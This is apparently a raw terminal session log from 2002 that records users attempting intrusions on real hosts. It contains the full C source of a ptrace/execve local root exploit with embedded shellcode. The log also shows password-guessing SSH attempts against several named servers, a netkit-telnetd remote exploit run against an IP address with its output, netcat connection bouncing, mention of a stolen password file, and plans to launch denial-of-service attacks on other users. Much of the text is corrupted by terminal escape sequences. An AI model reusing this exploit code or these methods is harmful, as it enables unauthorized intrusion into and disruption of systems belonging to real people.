/usr/sbin/utempter /usr/sbin/sendmail /usr/sbin/usernetctl /usr/sbin/suexec /bin/ping /bin/mount /bin/umount /bin/su /sbin/pwdb_chkpwd /sbin/unix_chkpwd /sbin/netreport [glen@fran glen]$ cat z | xargs ls -l -rwsr-xr-x 1 root root 56508 Apr 30 2001 /bin/mount -rwsr-xr-x 1 root root 22620 Jan 16 2001 /bin/ping -rwsr-xr-x 1 root root 14112 Jan 16 2001 /bin/su -rwsr-xr-x 1 root root 25148 Apr 30 2001 /bin/umount -rwxr-sr-x 1 root root 4160 Sep 21 11:11 /sbin/netreport -r-sr-xr-x 1 root root 15120 Nov 9 10:33 /sbin/pwdb_chkpwd -r-sr-xr-x 1 root root 16856 Nov 9 10:33 /sbin/unix_chkpwd -rwsr-xr-x 1 root root 37764 Apr 4 2001 /usr/bin/at -rwsr-xr-x 1 root root 34588 Mar 9 2001 /usr/bin/chage -rws--x--x 1 root root 13136 Dec 4 17:55 /usr/bin/chfn -rws--x--x 1 root root 12484 Dec 4 17:55 /usr/bin/chsh -rwsr-xr-x 1 root root 21312 Mar 8 2001 /usr/bin/crontab -rwsr-xr-x 1 root root 36228 Mar 9 2001 /usr/bin/gpasswd -rwxr-sr-x 1 root mail 12440 Jul 3 2001 /usr/bin/lockfile -rws--x--x 1 root root 5456 Dec 4 17:55 /usr/bin/newgrp -r-s--x--x 1 root root 13536 Jul 12 2000 /usr/bin/passwd -rwxr-sr-x 1 root slocate 24508 Feb 26 2001 /usr/bin/slocate -rws--x--x 2 root root 795092 Mar 23 2001 /usr/bin/sperl5.6.0 -rwsr-xr-x 1 root root 212300 Dec 3 14:18 /usr/bin/ssh -rws--x--x 2 root root 795092 Mar 23 2001 /usr/bin/suidperl -r-xr-sr-x 1 root tty 6492 Jun 21 2001 /usr/bin/wall -rwxr-sr-x 1 root tty 8744 Dec 4 17:55 /usr/bin/write -r-sr-xr-x 1 root root 455620 Oct 14 04:52 /usr/sbin/sendmail -r-s--x--- 1 root apache 11296 Nov 15 14:53 /usr/sbin/suexec -rwsr-xr-x 1 root root 18256 Dec 1 2000 /usr/sbin/traceroute -rwsr-xr-x 1 root root 6392 Sep 21 11:11 /usr/sbin/usernetctl -rwxr-sr-x 1 root utmp 6584 Jul 12 2000 /usr/sbin/utempter [glen@fran glen]$ wget ]2;screen]2; Wuff ---- Wuff!! lynx ]2;screen]2;g len@fran.fifthavenuevideo.com: /home/glen-source www.netspace.net.au/~hellman/2 .c /* [8C20.10.2001 [8Cexploits the ptrace/execve kernel bug [8Cbased on Nergel's exp. recoded by Moo0 [8C[8C [8Cthis isnt the old bug, tested on slack kernels: [8C2.2.19 & 2.4.4 [8Cit requirez writing permission in working directory (try /tmp) [8Cthis assums su/newgrp arent PAM based. [8C */ #include#include #include #include #include #include #include #include #include #include #define FILE "./TMP" void runprog(void) { struct stat st; unlink(FILE); while (stat(FILE,&st)); usleep(1000); execl("/usr/bin/gpasswd","passwd",0); perror("execl"); exit(-1); } char code[] = "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80" "\xeb\x25\x5e\x89\xf3\x83\xc3\xe0\x89\x73\x28\x31\xc0\x88\x43\x27\x89\x43" "\x2c\x83\xe8\xf5\x8d\x4b\x28\x8d\x53\x2c\x89\xf3\xcd\x80\x31\xdb\x89\xd8" "\x40\xcd\x80\xe8\xd6\xff\xff\xff/bin/sh" ; unsigned long getaddr(int pid) { int fd,i; char file[32],tmp[100],*ptr; snprintf(file,sizeof(file)-1,"/proc/%d/maps",pid); fd = open(file,0); if (fd < 0) { perror(file); return(0); } for (;read(fd,tmp,sizeof(tmp));) { ptr = (char *)strstr(tmp,"00:00"); if (ptr) { ptr-=32; return(strtoul(ptr,NULL,16)); } } fprintf(stderr,"cant allocate free memory at %s.\n",file); return(0); } void inject(int pid) { struct user_regs_struct save; int i,dword,size; unsigned int address; bzero(&save,sizeof(save)); i = ptrace(PTRACE_GETREGS,pid,0,&save); if (i) { perror("get"); exit(-1); } size = strlen(code); address = getaddr(pid); save.eip = address; while (size % 4 != 0) size++; for(i=0;i pw_name); [8Cpass = getpass(buf); [8C} i = ptrace(PTRACE_ATTACH,pid,0,0); if (i) { [8Cperror("attach"); [8Cexit(0); } waitpid(pid,NULL,WUNTRACED); i = ptrace(PTRACE_CONT,pid,0,0); if (i) perror("cont"); fputs("Now sit back and enjoy the ride...\n",stderr); if (!fork()) { [8Cusleep(700000); [8Cunlink(FILE); [8Cif (argc == 1) strcat(pass,"\n"); [8Celse { pass = buf; strcpy(pass,"blah\n"); } [8C while (*pass && !ioctl(0, TIOCSTI, pass++)); [8Cusleep(400000); [8Csprintf(buf,"exec %s Moo0 %d\n",argv[0],pid); [8Cpass = buf; [8C while (*pass && !ioctl(0, TIOCSTI, pass++)); [8Cexit(0); [8C} creat(FILE,0777); if (argc == 1) execl("/bin/su","su",pw->pw_name,0); else execl("/usr/bin/newgrp","newgrp",0); perror("execl"); } [glen@fran glen]$ lynx -source www.netspace.net.au/~hellman/2.c > 2.c [glen@fran glen]$ gcc -= ]2;screen]2; Wuff ---- Wuff!! gcc ]2;screen] 2;glen@fran.fifthavenuevideo.com: /home/glen-o 2 2.c bash: gcc: command not found [glen@fran glen]$ wtf [glen@fran glen]$ whereis sgicc sgicc: [glen@fran glen]$ whereis gcc gcc: [glen@fran glen]$ uname -a Linux fran.fifthavenuevideo.com 2.4.2-2smp #1 SMP Sun Apr 8 19:15:45 EDT 2001 i 5 [glen@fran glen]$ wheries cc bash: wheries: command not found [glen@fran glen]$ find / -name gcc find: /home/jparis: Permission denied find: /home/drussell: Permission denied find: /home/fran/mail: Permission denied find: /usr/lib/pgsql/backup: Permission denied find: /var/lib/slocate: Permission denied find: /var/lib/pgsql/backups: Permission denied find: /var/lib/pgsql/data: Permission denied find: /var/lib/mysql/mysql: Permission denied find: /var/lib/mysql/test: Permission denied find: /var/lib/mysql/watsekacomm: Permission denied find: /var/spool/at: Permission denied find: /var/spool/cron: Permission denied find: /proc/1/fd: Permission denied find: /proc/2/fd: Permission denied find: /proc/3/fd: Permission denied find: /proc/4/fd: Permission denied find: /proc/5/fd: Permission denied find: /proc/6/fd: Permission denied find: /proc/7/fd: Permission denied find: /proc/431/fd: Permission denied find: /proc/436/fd: Permission denied find: /proc/557/fd: Permission denied find: /proc/572/fd: Permission denied find: /proc/607/fd: Permission denied find: /proc/641/fd: Permission denied find: /proc/647/fd: Permission denied find: /proc/648/fd: Permission denied find: /proc/657/fd: Permission denied find: /proc/676/fd: Permission denied find: /proc/700/fd: Permission denied find: /proc/738/fd: Permission denied find: /proc/739/fd: Permission denied find: /proc/740/fd: Permission denied find: /proc/741/fd: Permission denied find: /proc/742/fd: Permission denied find: /proc/743/fd: Permission denied find: /proc/3417/fd: Permission denied find: /proc/4417/fd: Permission denied find: /proc/12263/fd: Permission denied find: /proc/12264/fd: Permission denied find: /proc/12265/fd: Permission denied find: /proc/12266/fd: Permission denied find: /proc/12267/fd: Permission denied find: /proc/12268/fd: Permission denied find: /proc/12269/fd: Permission denied find: /proc/12270/fd: Permission denied find: /proc/17543/fd: Permission denied find: /etc/default: Permission denied find: /etc/httpd/conf/ssl.crl: Permission denied find: /etc/httpd/conf/ssl.crt: Permission denied find: /etc/httpd/conf/ssl.csr: Permission denied find: /etc/httpd/conf/ssl.key: Permission denied find: /etc/httpd/conf/ssl.prm: Permission denied find: /root: Permission denied [glen@fran glen]$ no compiler [glen@fran glen]$ rm 2.c [glen@fran glen]$ rm z [glen@fran glen]$ next boz x heh [glen@fran glen]$ o wait [glen@fran glen]$ lynx -source www.netspace.net.au/` ~hellman/2 [glen@fran glen]$ lynx -source www.netspace.net.au/~hellman/2 > 2 [glen@fran glen]$ ls -la 2 -rw-rw-r-- 1 glen glen 20694 Jan 14 02:48 2 [glen@fran glen]$ chmod +x 2 [glen@fran glen]$ ./2 using /bin/su kernel ptrace/execve race condition exploit by Moo0 enter glen's password: Now sit back and enjoy the ride... Password: exec ./2 Moo0 17626 su: incorrect password how did o u detach this shit ? ctrl-c?^X control-z then kill ? ugh sec [glen@fran glen]$ [glen@fran glen]$ control-z then kill ? bash: control-z: command not found [glen@fran glen]$ [glen@fran glen]$ [glen@fran glen]$ ugh sec [glen@fran glen]$ ./2 using /bin/su kernel ptrace/execve race condition exploit by Moo0 enter glen's password: Now sit back and enjoy the ride... Password: exec ./2 Moo0 17666 [glen@fran glen]$ exec ./2 Moo0 17666 get: No such process [glen@fran glen]$ [glen@fran glen]$ rm 2 [glen@fran glen]$ ssh Usage: ssh [options] host [command] Options: -l user Log in using this user name. -n Redirect input from /dev/null. -A Enable authentication agent forwarding. -a Disable authentication agent forwarding. -X Enable X11 connection forwarding. -x Disable X11 connection forwarding. -i file Identity for public key authentication (default: ~/.ssh/identity) -t Tty; allocate a tty even if command is given. -T Do not allocate a tty. -v Verbose; display verbose debugging messages. Multiple -v increases verbosity. -V Display version number only. -P Don't allocate a privileged port. -q Quiet; don't display any warning messages. -f Fork into background after authentication. -e char Set escape character; ``none'' = disable (default: ~). -c cipher Select encryption algorithm: ``3des'', ``blowfish'' -m macs Specify MAC algorithms for protocol version 2. -p port Connect to this port. Server must be on the same port. -L listen-port:host:port Forward local port to remote address -R listen-port:host:port Forward remote port to local address These cause ssh to listen for connections on a port, and forward them to the other side by connecting to host:port. -C Enable compression. -N Do not execute a shell or command. -g Allow remote hosts to connect to forwarded ports. -1 Force protocol version 1. -2 Force protocol version 2. -4 Use IPv4 only. -6 Use IPv6 only. -o 'option' Process the option as if it was read from a configuration file. -s Invoke command (mandatory) as SSH2 subsystem. [glen@fran glen]$ s [glen@fran glen]$ [glen@fran glen]$ [glen@fran glen]$ ssh narcbb@narcbb.org The authenticity of host 'narcbb.org (216.36.201.52)' can't be established. RSA1 key fingerprint is 7e:9c:3a:35:65:c2:03:d0:d3:00:e3:f0:2a:87:2c:e7. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'narcbb.org,216.36.201.52' (RSA1) to the list of kno w narcbb@narcbb.org's password: Last login: Mon Jan 14 00:18:49 2002 from eris.io.com ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Please observe that the following are NOT allowed: *Any ATTEMPT to undermine the system or to gain unauthorized access. *Use our system to attack other systems. *Warez, IRC or IRC robots. *Adult content or links to them. *Spamming (the sending of mass UNSOLICITED emails). *Non-Java chat rooms. Java chat rooms are available for a fee. Any violators will be subject to immediate account disablement. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Also, please observe any copyright restrictions. Thank you. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ No mail. ]2;screen]2;narcbb@cobain.siteprotect.com: /home/narcbbcobain:~$ unset HISTFILE cobain:~$ w Error: /proc must be mounted To mount /proc at boot you need an /etc/fstab line like: /proc /proc proc defaults In the meantime, mount /proc /proc -t proc cobain:~$ uname -a Linux cobain.siteprotect.com 2.4.15-pre8 #1 Wed Nov 21 13:16:53 CST 2001 i686 u n cobain:~$ stipeproject ]2;screen]2; Wuff ---- Wuff!! stile]2;s creen]2;narcbb@cobain.siteprotect.com: /home/narcbb hehe cobain:~$ dns bash: dns: command not found cobain:~$ /bin/dns bash: /bin/dns: No such file or directory cobain:~$ /bin/ ]2;screen]2; Wuff ---- Wuff!! ]2;screen]2;narcbb@cobai n.siteprotect.com: /home/narcbbexit logout [H[H[2J[15LConnection to narcbb.org closed. ]2;screen]2;glen@fran.fifthavenuevideo.com: /home/glen[glen@fran glen]$ ssh hab bakuk@ageofdragons.com The authenticity of host 'ageofdragons.com (208.204.46.28)' can't be establishe d RSA key fingerprint is 92:8f:91:5a:9d:f8:4d:ce:5e:be:a8:56:15:fb:a9:b4. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'ageofdragons.com,208.204.46.28' (RSA) to the list o f habbakuk@ageofdragons.com's password: Permission denied, please try again. habbakuk@ageofdragons.com's password: [glen@fran glen]$ ssh draith@rakis.net The authenticity of host 'rakis.net (207.8.143.12)' can't be established. RSA key fingerprint is 36:dd:21:9a:62:95:e6:8c:b9:7b:72:a7:24:4f:73:28. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'rakis.net,207.8.143.12' (RSA) to the list of known h draith@rakis.net's password: Permission denied, please try again. draith@rakis.net's password: [glen@fran glen]$ cant b ]2;screen]2; Wuff ---- Wuff!! ]2;screen]2;gl en@fran.fifthavenuevideo.com: /home/glenssh bashful@ignite.blackened.net The authenticity of host 'ignite.blackened.net (216.66.74.129)' can't be establ i RSA key fingerprint is 14:d9:c4:ae:54:d9:fd:6e:b7:76:81:e8:1f:3b:02:ef. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'ignite.blackened.net,216.66.74.129' (RSA) to the li s bashful@ignite.blackened.net's password: Permission denied, please try again. bashful@ignite.blackened.net's password: [glen@fran glen]$ ssh -l marke 209.48.190.41 The authenticity of host '209.48.190.41 (209.48.190.41)' can't be established. [H[2M[22BRSA key fingerprint is ec:07:8a:8a:23:10:b1:16:6a:f5:2e:84:dc:f2:2d:bb . Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '209.48.190.41' (RSA) to the list of known hosts. marke@209.48.190.41's password: Permission denied, please try again. marke@209.48.190.41's password: [glen@fran glen]$ ssh -l seanw 209.48.190.41 seanw@209.48.190.41's password: Permission denied, please try again. seanw@209.48.190.41's password: [glen@fran glen]$ ssh -l pulp 209.48.190.41 pulp@209.48.190.41's password: Permission denied, please try again. pulp@209.48.190.41's password: Permission denied, please try again. pulp@209.48.190.41's password: [glen@fran glen]$ ssh -l wchang 209.48.190.41 wchang@209.48.190.41's password: Permission denied, please try again. wchang@209.48.190.41's password: [glen@fran glen]$ [glen@fran glen]$ ssh -l mthomas 209.48.190.41 mthomas@209.48.190.41's password: Permission denied, please try again. mthomas@209.48.190.41's password: [glen@fran glen]$ exit logout [H[H[2J[15LConnection to fran.fifthavenuevideo.com closed. marcos@leaf[~]10: nd CORRECT>end (y|n|e|a)? no nd: Command not found. marcos@leaf[~]11: c [H[H[2Jmarcos@leaf[~]12: nc CORRECT>c (y|n|e|a)? [Kmarcos@leaf[~]12: exit logout Connection to aladdin.danforthcenter.org closed. bob@kas:~$ nc -p 4438 209.48.190.41 21 nc: cannot establish connection: Connection refused bob@kas:~$ nc -p 4438 209.48.190.41 21 2 bob@kas:~$ nc -p 4438 209.48.190.41 22 3 nc: cannot establish connection: Connection refused bob@kas:~$ nc -p 4438 209.48.190.41 23 5 imback!! 220 Moebius.baked.net ESMTP Sendmail 8.9.3/8.9.3; Mon, 14 Jan 2002 02:54:23 -05 0 500 Command unrecognized: "imback!!" bob@kas:~$ nc -p 4438 209.48.190.41 25 nc: cannot establish connection: Cannot assign requested address bob@kas:~$ nc -p 4438 209.48.190.41 25 nc: cannot establish connection: Cannot assign requested address bob@kas:~$ nc -p 4438 209.48.190.41 25 110 +OK Cubic Circle's v1.31 1998/05/13 POP3 ready <7f230000b78e423c@Moebius> bob@kas:~$ forgot the pass ghe bob@kas:~$ bob@kas:~$ try the ones you know. which ones do you bob@kas:~$ nc -p 4438 209.48.190.41 110[P25 nc: cannot establish connection: Cannot assign requested address bob@kas:~$ gotta wait for the time_sync to delay out bob@kas:~$ pd uses like 15 of em on a ra otating p basis heh bob@kas:~$ nc -p 4438 209.48.190.41 25110[P25 nc: cannot establish connection: Cannot assign requested address bob@kas:~$ nc -p 4438 209.48.190.41 25 nc: cannot establish connection: Cannot assign requested address bob@kas:~$ nc [8C Usage: [8C [8Cnc [-46nh] [-p port] [-s addr] hostname port [8Cnc -l -p port [-s addr] [-46nh] [hostname] [port] Recognized options are: [4C-4[9CUse only IPv4 [4C-6[9CUse only IPv6 [4C-l[9CListen mode, for inbound connects [4C-s addr[4CLocal source address [4C-p port[4CLocal source port [4C-n[9CNumeric-only IP addresses, no DNS [4C-h[9CDisplay help [H[2M[23Bbob@kas:~$ nc -p 4438 209.48.190.41 25 220 Moebius.baked.net ESMTP Sendmail 8.9.3/8.9.3; Mon, 14 Jan 2002 02:55:34 -05 0 bob@kas:~$ ok fuckj this lets just hack from heere bob@kas:~$ su - You are not authorized to su root bob@kas:~$ su kas = - Access to su to that account DENIED. You are not authorized to su kas bob@kas:~$ ssh h -l root localhost The authenticity of host 'localhost (127.0.0.1)' can't be established. RSA key fingerprint is c2:d9:c9:36:30:a8:58:f4:c5:3e:11:b6:0c:1a:de:a9. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'localhost' (RSA) to the list of known hosts. root@localhost's password: Last login: Mon Jan 14 18:31:21 2002 from d252-ps4-mel.alphalink.com.au Linux 2.2.20-ow1-hap-2-lbsd1. root@kas:~# k root@kas:~# cd /stuff root@kas:/stuff# cd ~bob root@kas:/home/bob# ls -la total 28 drwx--x--x 4 bob users 4096 Jan 14 18:35 [1m[34m.[m/ drwxr-xr-x 24 root root 4096 Jan 14 18:29 [1m[34m..[m/ -rw-r--r-- 1 bob users 34 Jan 14 18:29 .less -rw-r--r-- 1 bob users 114 Jan 14 18:29 .lessrc drwx------ 2 bob users 4096 Jan 14 18:30 [1m[34m.screen[m/ -rw-r--r-- 1 bob users 3394 Jan 14 18:29 .screenrc drwx------ 2 bob users 4096 Jan 14 18:36 [1m[34m.ssh[m/ root@kas:/home/bob# k root@kas:/home/bob# whawt ats pdlo oiyto root@kas:/home/bob# u want me to do ? root@kas:/home/bob# what ]2;screen]2; Wuff ---- Wuff!! what d]2;screen ]2;glen@fran.fifthavenuevideo.com: /home/glenid uw ant to do ? root@kas:/home/bob# iw ant tlhis etrhs'6.2 box root@kas:/home/bob# whicn 1 root@kas:/home/bob# telnet 157.238.46.35 23 Trying 157.238.46.35... Connected to 157.238.46.35. Escape character is '^]'. Red Hat Linux release 6.2 (Zoot) Kernel 2.2.19 on an i686 login: telnet> quit Connection closed. root@kas:/home/bob# telnet 157.238.46.35 23 1 Trying 157.238.46.35... Connected to 157.238.46.35. Escape character is '^]'. 220 ProFTPD 1.2.4 Server (ProFTPD) [yellow.srv2.com] ^] telnet> quit Connection closed. root@kas:/home/bob# i need ot put file on ur box wh hwo do i do it root@kas:/home/bob# where is ur file root@kas:/home/bob# telentd exploit that root@kas:/home/bob# sctu ut wrote 4 me root@kas:/home/bob# just ftp kas.net.au bob / hackerbob root@kas:/home/bob# put sploit root@kas:/home/bob# exi root@kas:/home/bob# hehe root@kas:/home/bob# or ftp from here same shit root@kas:/home/bob# telnet 157.238.46.35 213 root@kas:/home/bob# ls -la telnet 157.238.46.35 23 5 Trying 157.238.46.35... Connected to 157.238.46.35. Escape character is '^]'. 220-yellow.srv2.com ESMTP Exim 3.34 #1 Mon, 14 Jan 2002 00:58:36 -0700 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail. ^] telnet> quit Connection closed. root@kas:/home/bob# thats vuln too it hink root@kas:/home/bob# imme sec root@kas:/home/bob# ls -a [1m[34m.[m/ [1m[34m..[m/ .less .lessrc [1m[34m.screen[m/ .screenrc [1m[34 m.ssh[m/ [1m[32mx[m* root@kas:/home/bob# ./x netkit-telnetd exploit by qitest1 Usage: ./x [options] Options: -h hostname -t target -l location Available targets: 0) Red Hat 6.2 with telnetd from default installation 1) Red Hat 6.2 with netkit-telnet-0.16 from tar.gz 2) Red Hat 7.0 with telnetd from default installation 3) Red Hat 7.1 with telnetd from default installation 4) Debian 2.2r3 potato with telnetd from default installation root@kas:/home/bob# what box? bash: what: command not found root@kas:/home/bob# root@kas:/home/bob# 157.238.46.35 root@kas:/home/bob# ./x telnet 157.238.46.35 Trying 157.238.46.35... Connected to 157.238.46.35. Escape character is '^]'. Red Hat Linux release 6.2 (Zoot) Kernel 2.2.19 on an i686 login: telnet> quit Connection closed. root@kas:/home/bob# ./x netkit-telnetd exploit by qitest1 Usage: ./x [options] Options: -h hostname -t target -l location Available targets: 0) Red Hat 6.2 with telnetd from default installation 1) Red Hat 6.2 with netkit-telnet-0.16 from tar.gz 2) Red Hat 7.0 with telnetd from default installation 3) Red Hat 7.1 with telnetd from default installation 4) Debian 2.2r3 potato with telnetd from default installation root@kas:/home/bob# ./x 157.238.46.35. -h 157.238.46.35. -t0;rm . /x netkit-telnetd exploit by qitest1 +Looking for the hostname in the AYT answer at 157.238.46.35... found: +Host: 157.238.46.35 as: Red Hat 6.2 with telnetd from default installation +Connecting to 157.238.46.35... connected +Telnet protocol rules... yeah +Setting 2 env var... done +Calculating some stuff... done, fildap.ayt_n: 1644 and fildap.opt_n: 8 +Filling for char: 0xffffffcc... done +Calculating some stuff... done, fildap.ayt_n: 1644 and fildap.opt_n: 11 +Filling for char: 0x10... done +Calculating some stuff... done, fildap.ayt_n: 1642 and fildap.opt_n: 19 +Filling for char: 0x69... done +Calculating some stuff... done, fildap.ayt_n: 1638 and fildap.opt_n: 36 +Filling for char: 0x68... done +Calculating some stuff... done, fildap.ayt_n: 1633 and fildap.opt_n: 57 +Filling for char: 0x69... done +Building fake chunk and shellcode area... done, with padding: 3128, location: 0x80503f4 and retaddr: 0x8057438 +Working for you... dude +Waiting for a real root shell... i0x69 rulez! =) connect(): Connection refused root@kas:/home/bob# NOT VULN D00D root@kas:/home/bob# root@kas:/home/bob# you want root@kas:/home/bob# you want to call me? root@kas:/home/bob# w ls -a [1m[34m.[m/ [1m[34m..[m/ .less .lessrc [1m[34m.screen[m/ .screenrc [1m[34 m.ssh[m/ root@kas:/home/bob# last bob |,ore last bob |more bob pts/20 mystic.uprising. Mon Jan 14 19:04 still logged in bob pts/18 61.129.67.238 Mon Jan 14 18:33 still logged in bob pts/17 mystic.uprising. Mon Jan 14 18:32 still logged in bob pts/14 localhost Mon Jan 14 18:30 - 19:07 (00:36) wtmp begins Thu Jan 1 00:36:18 1970 root@kas:/home/bob# hmmmm root@kas:/home/bob# anytnig else u want to try so far? root@kas:/home/bob# !tel telnet 157.238.46.35 Trying 157.238.46.35... Connected to 157.238.46.35. Escape character is '^]'. ^C Red Hat Linux release 6.2 (Zoot) Kernel 2.2.19 on an i686 telnet> quit Connection closed. root@kas:/home/bob# telnet 157.238.46.35 1 Trying 157.238.46.31... telnet: Unable to connect to remote host: Connection refused root@kas:/home/bob# root@kas:/home/bob# telnet 157.238.46.31 5 21 Trying 157.238.46.35... Connected to 157.238.46.35. Escape character is '^]'. 220 ProFTPD 1.2.4 Server (ProFTPD) [yellow.srv2.com] ^] telnet> quit Connection closed. root@kas:/home/bob# i forgot what proftpd is vuln too root@kas:/home/bob# er fuck i di i dun got an acct root@kas:/home/bob# brb gonna try saomething bash: brb: command not found root@kas:/home/bob# watit a sec. trying something root@kas:/home/bob# trying to root me ? heh root@kas:/home/bob# uhmm no. this is root. why would anyone do that root@kas:/home/bob# heh i duno root@kas:/home/bob# u prolly got things that i duno wh bout root@kas:/home/bob# /bin/login maybe root@kas:/home/bob# i prolly got things u dun o o about .. root@kas:/home/bob# let's see them :) root@kas:/home/bob# their on phix which i dont got aces to for a ef root@kas:/home/bob# you got any more accnts on scuts fboxesew days? root@kas:/home/bob# naa i i never did have any did i root@kas:/home/bob# ? root@kas:/home/bob# the one you tried earlier you said was scuts. i think he us e[H[35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P[45Cs it. kalifironia [H[4h [4lConnected to 157.238.46.35. [4h [4lEscape character is '^]'. [4h [4l220 ProFTPD 1.2.4 Server (ProFTPD) [4h [4l^] [4h [4ltelnet> quit [4h [4lConnection closed. [4h [4lroot@kas:/home/bob# i forgot what p [4h [4lroot@kas:/home/bob# er fuck i i dun [4h [4lroot@kas:/home/bob# brb gonna try s [4h [4lbash: brb: command not found [4h [4lroot@kas:/home/bob# watit a sec. t [4h [4lroot@kas:/home/bob# trying to root [4h [4lroot@kas:/home/bob# uhmm no. this [4h [4lroot@kas:/home/bob# heh i duno [4h [4lroot@kas:/home/bob# u prolly got th [4h [4lroot@kas:/home/bob# /bin/login mayb [4h [4lroot@kas:/home/bob# i prolly got th [4h [4lroot@kas:/home/bob# let's see them [4h [4lroot@kas:/home/bob# their on phix w [4h [4lroot@kas:/home/bob# you got any mor [4h [4lroot@kas:/home/bob# naa i never did [4h [4lroot@kas:/home/bob# ? [4h [4lroot@kas:/home/bob# the one you tri [4h [4lroot@kas:/home/bob# oh root@kas:/home/bob# i got the passwd file root@kas:/home/bob# but its again on phix root@kas:/home/bob# \; root@kas:/home/bob# we should dos some people. i'm in that kind of mood root@kas:/home/bob# ssh -l marauder@phix.com Usage: ssh [options] host [command] Options: -l user Log in using this user name. -n Redirect input from /dev/null. -F config Config file (default: ~/.ssh/config). -A Enable authentication agent forwarding. -a Disable authentication agent forwarding (default). -X Enable X11 connection forwarding. -x Disable X11 connection forwarding (default). -i file Identity for public key authentication (default: ~/.ssh/identity) -t Tty; allocate a tty even if command is given. -T Do not allocate a tty. -v Verbose; display verbose debugging messages. Multiple -v increases verbosity. -V Display version number only. -P Don't allocate a privileged port. -q Quiet; don't display any warning messages. -f Fork into background after authentication. -e char Set escape character; ``none'' = disable (default: ~). -c cipher Select encryption algorithm -m macs Specify MAC algorithms for protocol version 2. -p port Connect to this port. Server must be on the same port. -L listen-port:host:port Forward local port to remote address -R listen-port:host:port Forward remote port to local address These cause ssh to listen for connections on a port, and forward them to the other side by connecting to host:port. -D port Enable dynamic application-level port forwarding. -C Enable compression. -N Do not execute a shell or command. -g Allow remote hosts to connect to forwarded ports. -1 Force protocol version 1. -2 Force protocol version 2. -4 Use IPv4 only. -6 Use IPv6 only. -o 'option' Process the option as if it was read from a configuration file. -s Invoke command (mandatory) as SSH2 subsystem. -b addr Local IP address. root@kas:/home/bob# ssh marauder@phix.com The authenticity of host 'phix.com (199.120.223.1)' can't be established. RSA1 key fingerprint is c2:40:ec:23:1a:6b:b9:35:23:fd:0c:df:d1:eb:e7:3a. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'phix.com,199.120.223.1' (RSA1) to the list of known marauder@phix.com's password: Permission denied, please try again. marauder@phix.com's password: Permission denied, please try again. marauder@phix.com's password: root@kas:/home/bob# damn root@kas:/home/bob# marauder - ti 1bbetz root@kas:/home/bob# let's dos seome boxxes root@kas:/home/bob# yah k sec leme find some nicks heh root@kas:/home/bob# tail ravint.net apple.cored.org fcae.acast.nova.edu 157.238.46.35 redpanda.jp root@kas:/home/bob# tail is fcae stil li386 yep let's dos the guy taht took the nick bob root@kas:/home/bob# unless u have better ideas root@kas:/home/bob# tail | bob (uridas@NS1.1115.NET) (Internic Network) heh wtf host is that root@kas:/home/bob# traceroute NS1.1115.NET traceroute to NS1.1115.NET (64.56.106.202), 30 hops max, 40 byte packets 1 203.214.248.1 (203.214.248.1) 0.294 ms 0.239 ms 0.232 ms 2 dcr01-g5-0.mlbn01.exodus.net (64.15.32.57) 0.195 ms 0.166 ms 0.161 ms 3 ibr02-g6-0.mlbn01.exodus.net (64.15.32.17) 0.267 ms 0.213 ms 0.198 ms 4 POS0-1-0.mb1.optus.net.au (203.202.149.173) 1.048 ms 0.892 ms 0.875 ms 5 POS5-0.sg2.optus.net.au (202.139.124.81) 13.446 ms 13.343 ms 13.643 ms 6 iar1-sonet2-3-0-0.Sydney.cw.net (166.63.229.25) 172.436 ms 172.611 ms 17 1[H[35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P[45C.837 ms [H[4h [4lfcae.acast.nova.edu [4h [4l157.238.46.35 [4h [4lredpanda.jp [4h [4lroot@kas:/home/bob# tail [4h [4lis fcae stil li386 [4h [4lyep [4h [4llet's dos the guy taht took the nic [4h [4lroot@kas:/home/bob# unless u have b [4h [4lroot@kas:/home/bob# tail [4h [4l| bob (uridas@NS1.1115.NET) (Intern [4h [4lheh wtf host is that [4h [4lroot@kas:/home/bob# traceroute NS1. [4h [4ltraceroute to NS1.1115.NET (64.56.1 [4h [34D[4l1 203.214.248.1 (203.214.248.1) [4h [34D[4l2 dcr01-g5-0.mlbn01.exodus.net (6 [4h [34D[4l3 ibr02-g6-0.mlbn01.exodus.net (6 [4h [34D[4l4 POS0-1-0.mb1.optus.net.au (203. [4h [34D[4l5 POS5-0.sg2.optus.net.au (202.13 [4h [34D[4l6 iar1-sonet2-3-0-0.Sydney.cw.net [4h [4l 7 bcr2.Sydney.cw.net (166.63.226.62) 172.23 ms 172.491 ms 172.444 ms 8 208.172.145.201 (208.172.145.201) 175.318 ms 176.797 ms 175.642 ms 9 acr2-loopback.Cleveland.cw.net (208.172.210.62) 231.192 ms 231.396 ms 23 1[H[35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P[45C.837 ms [35P [35P [35P[45C.285 ms [H[4h [4lroot@kas:/home/bob# tail [4h [4lis fcae stil li386 [4h [4lyep [4h [4llet's dos the guy taht took the nic [4h [4lroot@kas:/home/bob# unless u have b [4h [4lroot@kas:/home/bob# tail [4h [4l| bob (uridas@NS1.1115.NET) (Intern [4h [4lheh wtf host is that [4h [4lroot@kas:/home/bob# traceroute NS1. [4h [4ltraceroute to NS1.1115.NET (64.56.1 [4h [34D[4l1 203.214.248.1 (203.214.248.1) [4h [34D[4l2 dcr01-g5-0.mlbn01.exodus.net (6 [4h [34D[4l3 ibr02-g6-0.mlbn01.exodus.net (6 [4h [34D[4l4 POS0-1-0.mb1.optus.net.au (203. [4h [34D[4l5 POS5-0.sg2.optus.net.au (202.13 [4h [34D[4l6 iar1-sonet2-3-0-0.Sydney.cw.net [4h [34D[4l7 bcr2.Sydney.cw.net (166.63.226. [4h [34D[4l8 